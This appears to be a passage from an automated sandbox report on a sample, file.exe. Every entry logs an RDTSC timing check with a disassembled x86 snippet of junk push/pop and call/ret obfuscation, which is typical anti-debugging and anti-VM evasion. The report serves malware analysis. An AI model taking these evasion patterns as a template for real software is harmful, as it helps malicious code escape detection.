              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0042 second address: 4A004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FB560E658C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49FEEE second address: 49FEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110D second address: 4A1112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A26EA second address: 4A274E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB560E1BD5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f jmp 00007FB560E1BD62h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FB560E1BD58h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov esi, 512F2381h 0x00000035 mov edi, dword ptr [ebp+122D3B4Bh] 0x0000003b push eax 0x0000003c push ecx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FB560E1BD5Dh 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3115 second address: 4A312D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB560E658CFh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A312D second address: 4A3133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3133 second address: 4A3137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A3CB1 second address: 4A3CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4853 second address: 4A48A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007FB560E658C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FB560E658C8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movsx edi, di 0x0000002e push 00000000h 0x00000030 cmc 0x00000031 mov esi, ebx 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB560E658D9h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A48A7 second address: 4A48AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A48AB second address: 4A48B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A48B1 second address: 4A48C5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB560E1BD58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A48C5 second address: 4A48CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8824 second address: 4A88BD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E1BD58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FB560E1BD65h 0x00000013 jmp 00007FB560E1BD66h 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007FB560E1BD58h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 add edi, dword ptr [ebp+122D27D5h] 0x0000003a mov dword ptr [ebp+124710E1h], edi 0x00000040 push 00000000h 0x00000042 mov edi, 22602A4Ah 0x00000047 push 00000000h 0x00000049 sbb edi, 5EAD840Ah 0x0000004f mov dword ptr [ebp+122D28E1h], esi 0x00000055 push eax 0x00000056 jns 00007FB560E1BD75h 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FB560E1BD67h 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8A4F second address: 4A8A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A9A4C second address: 4A9A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB560E1BD56h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA81A second address: 4AA832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560E658D4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A9A56 second address: 4A9A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA832 second address: 4AA8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c xor di, 918Dh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB560E658C8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FB560E658C8h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 or bx, 7CF2h 0x0000004e xchg eax, esi 0x0000004f jp 00007FB560E658D9h 0x00000055 jmp 00007FB560E658D3h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FB560E658CBh 0x00000062 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA8BF second address: 4AA8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA8C5 second address: 4AA8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA8C9 second address: 4AA8CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB89C second address: 4AB8A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD678 second address: 4AD721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB560E1BD66h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FB560E1BD70h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FB560E1BD58h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d xor dword ptr [ebp+122D2F94h], edi 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebp 0x00000038 call 00007FB560E1BD58h 0x0000003d pop ebp 0x0000003e mov dword ptr [esp+04h], ebp 0x00000042 add dword ptr [esp+04h], 0000001Bh 0x0000004a inc ebp 0x0000004b push ebp 0x0000004c ret 0x0000004d pop ebp 0x0000004e ret 0x0000004f mov dword ptr [ebp+124645ECh], ebx 0x00000055 jmp 00007FB560E1BD5Dh 0x0000005a push 00000000h 0x0000005c xchg eax, esi 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jo 00007FB560E1BD56h 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC836 second address: 4AC83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD721 second address: 4AD75D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB560E1BD56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB560E1BD62h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FB560E1BD6Ch 0x00000019 jmp 00007FB560E1BD66h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC8FD second address: 4AC903 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC903 second address: 4AC907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC907 second address: 4AC91A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB560E658C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC91A second address: 4AC91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC91E second address: 4AC924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF761 second address: 4AF765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE8C7 second address: 4AE8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE8CE second address: 4AE8D3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE8D3 second address: 4AE8E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b ja 00007FB560E658C6h 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B07FB second address: 4B07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF8D7 second address: 4AF8E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB560E658C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B07FF second address: 4B0810 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FB560E1BD56h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2929 second address: 4B2947 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB560E658D9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B381F second address: 4B3826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3826 second address: 4B38B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E658D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FB560E658C8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movsx edi, ax 0x00000027 stc 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FB560E658C8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 sub dword ptr [ebp+1245D3C9h], edx 0x0000004a jmp 00007FB560E658CCh 0x0000004f push 00000000h 0x00000051 add ebx, 17C70BF7h 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007FB560E658D7h 0x00000060 jmp 00007FB560E658D1h 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B38B5 second address: 4B38CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E1BD5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B38CF second address: 4B38D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B1AD5 second address: 4B1ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5A0A second address: 4B5A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB560E658C6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5A15 second address: 4B5A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB560E1BD61h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2AAE second address: 4B2AB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3A43 second address: 4B3A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FB560E1BD56h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B3A50 second address: 4B3A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4C4F second address: 4B4C54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7A2E second address: 4B7A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub ebx, 227E5100h 0x00000010 push 00000000h 0x00000012 and bx, 9E94h 0x00000017 push 00000000h 0x00000019 mov bl, 36h 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7A5E second address: 4B7A68 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7A68 second address: 4B7A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5613DF5AFh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BAAFC second address: 4BAB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB560E14CE1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C05FB second address: 4C060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C060C second address: 4C0618 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB560E14CD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0618 second address: 4C061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C061C second address: 4C0642 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB560E14CE4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0642 second address: 4C0651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FB5613DF5A6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0793 second address: 4C0797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0797 second address: 4C07B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB5613DF5BAh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C07B9 second address: 4C07C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB560E14CDAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C093F second address: 4C0962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0962 second address: 4C0970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560E14CDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0970 second address: 4C098F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB5613DF5B2h 0x00000008 jp 00007FB5613DF5A6h 0x0000000e jns 00007FB5613DF5A6h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 ja 00007FB5613DF5A6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9A8C second address: 4C9AC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB560E14CDAh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop edi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB560E14CE6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9AC1 second address: 4C9AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9C04 second address: 4C9C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9C08 second address: 4C9C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jl 00007FB5613DF5ACh 0x00000013 push esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 pop esi 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jng 00007FB5613DF5AEh 0x00000022 mov eax, dword ptr [eax] 0x00000024 jg 00007FB5613DF5B9h 0x0000002a jmp 00007FB5613DF5B3h 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 pushad 0x00000034 push esi 0x00000035 pushad 0x00000036 popad 0x00000037 pop esi 0x00000038 jnp 00007FB5613DF5ACh 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE052 second address: 4CE058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE058 second address: 4CE067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5613DF5ABh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE6D1 second address: 4CE6D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE6D5 second address: 4CE70F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5ABh 0x00000007 jnl 00007FB5613DF5A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007FB5613DF5ABh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB5613DF5B4h 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE70F second address: 4CE732 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB560E14CD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB560E14CE7h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE732 second address: 4CE736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEBA6 second address: 4CEBBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB560E14CD6h 0x0000000a jmp 00007FB560E14CDCh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CECFB second address: 4CED01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CED01 second address: 4CED05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CED05 second address: 4CED18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5613DF5AAh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEFFD second address: 4CF022 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14CD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB560E14CE1h 0x00000013 jne 00007FB560E14CD6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6A6E second address: 4D6A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6A74 second address: 4D6AA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB560E14CE9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edi 0x00000013 jmp 00007FB560E14CDCh 0x00000018 rdtsc
